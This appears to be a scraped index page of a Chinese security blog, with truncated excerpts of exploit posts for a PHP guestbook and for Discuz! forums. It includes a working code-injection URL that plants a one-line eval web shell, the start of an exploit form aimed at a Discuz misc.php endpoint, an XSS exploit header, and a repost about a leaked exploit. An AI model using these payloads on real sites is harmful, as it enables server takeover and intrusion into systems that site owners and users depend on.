guestbook/index.php?keywords=test&&page=3&${${phpinfo()}}
phpinfo替换成<?php eval($_POST[cmd])?>
<?php eval($_POST[cmd])?>
index.php?keywords=test&&page=3&${${<?php eval($_POST[cmd])?>}}
...
- 添加新评论
- 阅读次数:
第一种方法:
先注册个用户然后把
<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">
帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />
...
- 添加新评论
- 阅读次数:
Discuz! version 5.0.0 suffers from a cross site scripting vulnerability EXP
发布:admin | 发布时间: 2010年2月1日提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
========================================================================================
| # Title : Discuz! 5.0.0 Cross Site Scripting Vulnerability
...
- 添加新评论
- 阅读次数:
转自oldjun's blog
首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版本。
不难想象,exp流传的速度,A与B关系好,A发给B;B与C是好朋友,B发给C...总有人耐不住性子,泄露点风声,于是就人手一份。最受不了的是,竟然有些SB在群里拿来叫卖;实在不想说什么,要叫卖什么时候轮到你?人心不古,以后有的话还是自己藏着吧。
...
- 添加新评论
- 阅读次数: